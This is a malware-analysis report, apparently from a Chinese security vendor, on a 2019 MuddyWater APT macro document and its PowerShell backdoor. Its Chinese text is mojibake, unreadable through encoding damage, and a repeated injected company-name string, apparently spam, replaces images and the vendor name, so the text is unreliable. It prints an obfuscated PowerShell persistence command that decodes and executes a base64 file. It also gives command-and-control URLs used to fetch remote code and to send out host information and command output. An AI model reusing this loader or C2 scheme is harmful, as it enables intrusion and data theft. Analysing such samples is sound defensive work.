MuddyWater£¨ÎÛË®£©×îй¥»÷ÑùÌìÖ°Îö

Ðû²¼Ê±¼ä 2019-05-10
MuddyWaterÊÇÒ»¸öÀ´×ÔÓÚÒÁÀʵÄÖ÷ÒªÕë¶ÔÖж«µØÇø¾ÙÐй¥»÷µÄAPT×éÖ¯£¬£¬£¬£¬£¬£¬£¬Æä¹¥»÷Ä¿µÄÖ÷Òª¼¯ÖÐÓÚÕþ¸®¡¢µçÐż°ÄÜÔ´µÈÁìÓò¡£¡£¡£¡£¡£¡£¡£¡£

¿ËÈÕ£¬£¬£¬£¬£¬£¬£¬ÍòÀû¹ú¼Ê¹ÙÍø½ð¾¦Çå¾²Ñо¿ÍŶÓͨ¹ýVenusEyeÍþвÇ鱨ÖÐÐÄá÷ÁÔϵͳ²¶»ñµ½Ò»¸ö¿ÉÒÉÎĵµ£¬£¬£¬£¬£¬£¬£¬¾­Ì«¹ýÎöÈ·ÈÏÆäΪMuddyWater×îй¥»÷Ñù±¾¡£¡£¡£¡£¡£¡£¡£¡£


ÔØºÉÆÊÎö


¹¥»÷Ñù±¾ÎªÒ»¸öWordÎĵµ£¬£¬£¬£¬£¬£¬£¬·­¿ªºó»áÏÔʾÈçÏÂͼƬ£¬£¬£¬£¬£¬£¬£¬ÓÕʹÊܺ¦Õ߯ôÓúê¡£¡£¡£¡£¡£¡£¡£¡£

ÍòÀû¹ú¼Ê¹ÙÍø(ÖйúÓÎ)ÓÐÏÞ¹«Ë¾

ºê´úÂëÖ´Ðк󣬣¬£¬£¬£¬£¬£¬»áÊÍ·Åc:\programdata\SysTextEnc.iniÎļþ¡£¡£¡£¡£¡£¡£¡£¡£¸ÃÎļþÄÚÈÝΪһ´®Base64±àÂëÊý¾Ý¡£¡£¡£¡£¡£¡£¡£¡£

È»ºóÏòÆô¶¯ÏîдÈëÈçÏÂÏÂÁîÐУº
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nologo -w 1 -exec bypass -c "$ste=gc
c:\programdata\SysTextEnc.ini;iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($ste)))"

ÓÃÓÚ¿ª»ú½âÃܲ¢Ö´ÐÐc:\programdata\SysTextEnc.iniÎļþ¡£¡£¡£¡£¡£¡£¡£¡£½âÃÜÖ®ºóΪһ¶Îpowershell´úÂ룬£¬£¬£¬£¬£¬£¬¸Ã´úÂëÓÃÓÚÇëÇóhxxp://38.132.99.167/crf.txtÁ´½ÓµÄÊý¾Ý²¢Ö´ÐУ¬£¬£¬£¬£¬£¬£¬¸ÃÁ´½Ó·µ»ØµÄÊý¾ÝÈÔÈ»ÊÇÒ»¶ÎPowershell´úÂë¡£¡£¡£¡£¡£¡£¡£¡£
 

ÍòÀû¹ú¼Ê¹ÙÍø(ÖйúÓÎ)ÓÐÏÞ¹«Ë¾



ľÂíÆÊÎö


ÉÏÊöÀú³ÌÖÐÏÂÔØµÄPowershell´úÂë¼´MuddyWater×é֯ϰÓõÄpowershellľÂí¡£¡£¡£¡£¡£¡£¡£¡£

½â»ìÏýºó£¬£¬£¬£¬£¬£¬£¬ÆäÖ÷º¯ÊýÈçÏÂËùʾ£º

ÍòÀû¹ú¼Ê¹ÙÍø(ÖйúÓÎ)ÓÐÏÞ¹«Ë¾

ÒÀ´ÎÖ´ÐÐwlChecul£¬£¬£¬£¬£¬£¬£¬pmrHlsl£¬£¬£¬£¬£¬£¬£¬GECOANOO£¬£¬£¬£¬£¬£¬£¬gfxEcmdascrsltpÕâËĸöº¯Êý¡£¡£¡£¡£¡£¡£¡£¡£ÆäÖÐwlCheculÖ»ÊÇΪÁËÈ·ÈÏЧÀÍÆ÷×¼±¸×´Ì¬¡£¡£¡£¡£¡£¡£¡£¡£½á¹¹ÈçÏÂURL²¢ÒÔPOST·½·¨·¢ËÍÇëÇó£º
http://82.102.8.101/bcerrxy.php?rCecms=BlackWater

ÈôÊÇ·µ»ØÖµ²»Îª¿ÕÇÒ²»Îª%COPYTHAT%²Å»áÖ´ÐкóÐøº¯Êý¡£¡£¡£¡£¡£¡£¡£¡£Ö®ºóÖ´ÐÐpmrHlslº¯Êý£¬£¬£¬£¬£¬£¬£¬¸Ãº¯Êý»áŲÓÃWMI»ñÈ¡¶àÖÖÅÌËã»úÐÅÏ¢¡£¡£¡£¡£¡£¡£¡£¡£
 
ÍòÀû¹ú¼Ê¹ÙÍø(ÖйúÓÎ)ÓÐÏÞ¹«Ë¾

½«»ñµÃµÄÐÅϢʹÓá°*¡±¾ÙÐÐÆ´½Ó¡£¡£¡£¡£¡£¡£¡£¡£ÅÌËãÆ´½Óºó×Ö·û´®µÄMD5£¬£¬£¬£¬£¬£¬£¬Ôٺ͡°*1997* EP1¡±¾ÙÐÐÆ´½Ó£¬£¬£¬£¬£¬£¬£¬×îºó¾ÙÐÐbase64±àÂë¡£¡£¡£¡£¡£¡£¡£¡£

ÍòÀû¹ú¼Ê¹ÙÍø(ÖйúÓÎ)ÓÐÏÞ¹«Ë¾
 
Ö®ºó½«½á¹¹³öÀ´µÄBase64±àÂëÊý¾ÝÆ´½Ó³ÉÈçÏÂURL²¢ÒÔPOST·½·¨·¢ËͳöÈ¥£º
http://82.102.8.101/bcerrxy.php?riHl=[EncryptedData]

ÈôÊÇ·µ»ØÐ§¹û²»Îª¿Õ²¢ÇÒ²»Îª%BYE%Ôò¼ÌÐøºóÐøº¯ÊýµÄÖ´ÐС£¡£¡£¡£¡£¡£¡£¡£½ÓÏÂÀ´ÒªÖ´Ðеĺ¯ÊýΪGECOANOO¡£¡£¡£¡£¡£¡£¡£¡£

GeCOANOOº¯Êý½á¹¹ÈçÏÂÊý¾Ý£¬£¬£¬£¬£¬£¬£¬²¢ÒÔPOST·½·¨½«Æä·¢ËͳöÈ¥£º
http://82.102.8.101/bcerrxy.php?cienentit=[EncryptedData]

ÆäÖеÄEncryptedData¼´ÉÏÒ»´Î·¢ËÍÊý¾ÝÖоÙÐÐBase64±àÂëµÄMD5²¿·Ö¡£¡£¡£¡£¡£¡£¡£¡£ÈôÊÇ·µ»ØÐ§¹û²»Îª¿ÕÇÒ·µ»ØÖµ¾­ÓÉbase64½âÂëºó²»Îª"SHH"£¬£¬£¬£¬£¬£¬£¬Ôò½«½âÂëºóµÄ·µ»ØÖµ¸³Öµ¸øÒ»¸öÈ«¾Ö±äÁ¿gecdrEu£¬£¬£¬£¬£¬£¬£¬È»ºóÖ´ÐÐÏÂÒ»¸öº¯Êý£¬£¬£¬£¬£¬£¬£¬¿ÉÒÔÅжϸ³Öµ¸øgecdrEuµÄÊý¾ÝΪһ¶Îpowershell´úÂë¡£¡£¡£¡£¡£¡£¡£¡£
 
ÍòÀû¹ú¼Ê¹ÙÍø(ÖйúÓÎ)ÓÐÏÞ¹«Ë¾

×îºóͨ¹ýgfxEcmdascrsltpº¯ÊýÖ´ÐÐÈ«¾Ö±äÁ¿ÖеÄgecdrEuÖеÄpowershell´úÂë¡£¡£¡£¡£¡£¡£¡£¡£
 
ÍòÀû¹ú¼Ê¹ÙÍø(ÖйúÓÎ)ÓÐÏÞ¹«Ë¾

²¢½«·µ»ØÖµ¾ÙÐÐbase64±àÂ룬£¬£¬£¬£¬£¬£¬Æ´¼¯³ÉÈçϵÄURLÃûÌþÙÐÐÉÏ´«¡£¡£¡£¡£¡£¡£¡£¡£
http://82.102.8.101/bcerrxy.php?zCre=[Base64Str]


ËÝÔ´ÆÊÎö


ͨ¹ýVenusEyeÍþвÇ鱨ÖÐÐĹØÁªÏµÍ³£¬£¬£¬£¬£¬£¬£¬ÎÒÃÇ·¢Ã÷ÁËÁíÒ»¸öÔçÆÚµÄÑù±¾¡£¡£¡£¡£¡£¡£¡£¡£

ÍòÀû¹ú¼Ê¹ÙÍø(ÖйúÓÎ)ÓÐÏÞ¹«Ë¾

¸ÃÑù±¾ËùʹÓõÄÊÖÒÕ¶¼Óë±¾´ÎÎÒÃÇ·¢Ã÷µÄÑù±¾Èç³öÒ»ÕÞ¡£¡£¡£¡£¡£¡£¡£¡£

ͨ¹ýËÝÔ´ÆÊÎö£¬£¬£¬£¬£¬£¬£¬ÎÒÃÇ·¢Ã÷ÕâÁ½¸öÑù±¾¶¼ÓëÓÑÉÌ4ÔÂ10ÈÕÔÚÉ罻ýÌåÉÏÅû¶µÄMuddyWater¹¥»÷ÍÁ¶úÆäµÄÑùÄÚÇéËÆ¡£¡£¡£¡£¡£¡£¡£¡£ÏÂÃæÊÇÁ½Õߵĺê´úÂë±ÈÕÕ¡£¡£¡£¡£¡£¡£¡£¡£

ÍòÀû¹ú¼Ê¹ÙÍø(ÖйúÓÎ)ÓÐÏÞ¹«Ë¾


ÍòÀû¹ú¼Ê¹ÙÍø(ÖйúÓÎ)ÓÐÏÞ¹«Ë¾


ͨ¹ý±ÈÕÕ¿ÉÒÔ·¢Ã÷£¬£¬£¬£¬£¬£¬£¬¶þÕß¶¼Ê¹ÓÃÏàͬµÄ·½·¨»ñÈ¡ÅÌËã»úÐÅÏ¢£¬£¬£¬£¬£¬£¬£¬È»ºóʹÓÃÏàͬµÄÅÌËã·½·¨ÅÌËãÊܺ¦ÕßÖ÷»úµÄΨһ±êʶ¡£¡£¡£¡£¡£¡£¡£¡£

 

ÍòÀû¹ú¼Ê¹ÙÍø(ÖйúÓÎ)ÓÐÏÞ¹«Ë¾


Ïà±È֮ϣ¬£¬£¬£¬£¬£¬£¬ÔçÆÚ·¢Ã÷µÄÑù±¾½«ÉÏÏßÇëÇó¡¢»ñÈ¡powershell´úÂë¡¢ÉÏ´«ÏÂÁîÐÐÖ´ÐÐЧ¹û²ð·Ö³É²î±ðPHP¾ÙÐн»»¥¡£¡£¡£¡£¡£¡£¡£¡£¶øÏÖÔڵİ汾ÔòʹÓÃͳһ¸öPHPÎļþ¾ÙÐн»»¥¡£¡£¡£¡£¡£¡£¡£¡£²¢ÇÒÔçÆÚ°æ±¾ÈôÊÇÔÚÖ´ÐÐÀú³ÌÖÐÓöµ½¹ýʧ£¬£¬£¬£¬£¬£¬£¬Ôò»á½«¹ýʧÐÅÏ¢¼Í¼ÈÕÖ¾£¬£¬£¬£¬£¬£¬£¬¿ÉÊÇ×îа汾ÔòÖ±½Ó¿¢ÊÂÄ¿½ñ³ÌÐò¡£¡£¡£¡£¡£¡£¡£¡£

¹ØÓÚÖ´ÐÐÁ÷³ÌÀ´Ëµ£¬£¬£¬£¬£¬£¬£¬×îаæÄÚÇ鹨ÓÚÔçÆÚ°æ±¾Ò²Óнϴó²î±ð£¬£¬£¬£¬£¬£¬£¬¶þÕßµÄÖ´ÐÐÁ÷³ÌÈçÏ£º

ÍòÀû¹ú¼Ê¹ÙÍø(ÖйúÓÎ)ÓÐÏÞ¹«Ë¾


ÍòÀû¹ú¼Ê¹ÙÍø(ÖйúÓÎ)ÓÐÏÞ¹«Ë¾
 
Ïà±È֮ϣ¬£¬£¬£¬£¬£¬£¬×îÐµĹ¥»÷»î¶¯ÔöÌíÁËÆä»ù´¡ÉèÊ©£¬£¬£¬£¬£¬£¬£¬²¢ÇÒ½«Ö÷Ìå´úÂë°²Åŵ½Ô¶³ÌЧÀÍÆ÷Öжø²»ÊÇÖ±½Óͨ¹ý´¹ÂÚÎĵµÊͷŵ½ÍâµØ¡£¡£¡£¡£¡£¡£¡£¡£¿£¿£¿£¿ÉÒÔ¿´³ö¸Ã×éÖ¯ÔÚÒ»Ö±µÄ¸üÐÂÆä¹¥»÷·½·¨ºÍ·À¼ì²â·½·¨¡£¡£¡£¡£¡£¡£¡£¡£



×ܽá


MuddyWater×éÖ¯×ÔÅû¶֮ÔÂË·Ö±»îÔ¾ÖÁ½ñ£¬£¬£¬£¬£¬£¬£¬¸Ã×éÖ¯ºÜÊÇÇàíùʹÓÃPowershell½ÅÔ­À´±àдÆä¹¥»÷¹¤¾ß£¬£¬£¬£¬£¬£¬£¬²¢ÑÜÉú³öÁ˸Ã×éÖ¯µÄרÓÐľÂíPOWERSTATS¡£¡£¡£¡£¡£¡£¡£¡£ËäÈ»¸Ã×éÖ¯µÄPowershellľÂí¸üл»´úºÜ¿ì£¬£¬£¬£¬£¬£¬£¬¿ÉÊÇÎÒÃÇÈÔÄÜ´ÓÆäpowershell´úÂëÖп´µ½Ð©ÐíPOWERSTATSµÄÓ°×Ó¡£¡£¡£¡£¡£¡£¡£¡£


Íþвָ±ê£¨IOC£©


97bf0d6e11ee4118993ad9c4b959c916
b0de46b50e209b185987010238fc65f0
0cd84d601971a91cc023e16d94cc7e6c
82.102.8.101
38.132.99.167
http://38.132.99.167/crf.txt


½â¾ö¼Æ»®


1¡¢ÍòÀû¹ú¼Ê¹ÙÍøVenusEyeÍþвÇ鱨ÖÐÐÄÒѾ­Ö§³Ö¶Ô±¾´Î¹¥»÷»î¶¯Ïà¹ØÇ鱨µÄÅÌÎÊ¡£¡£¡£¡£¡£¡£¡£¡£

2¡¢ ÒѰ²ÅÅÍòÀû¹ú¼Ê¹ÙÍøIDS¡¢IPS²úÆ·µÄ¿Í»§ÇëÉý¼¶ÊÂÎñ¿âµ½×îа汾£¬£¬£¬£¬£¬£¬£¬¼´¿ÉÓÐÓüì²â»ò×è¶Ï¹¥»÷¡£¡£¡£¡£¡£¡£¡£¡£

3¡¢ ÒѰ²ÅÅÍòÀû¹ú¼Ê¹ÙÍøAPT¼ì²â²úÆ·µÄ¿Í»§ÎÞÐèÉý¼¶£¬£¬£¬£¬£¬£¬£¬¼´¿ÉÓÐÓüì²â´Ë´Î¹¥»÷¡£¡£¡£¡£¡£¡£¡£¡£

 

ÍòÀû¹ú¼Ê¹ÙÍø(ÖйúÓÎ)ÓÐÏÞ¹«Ë¾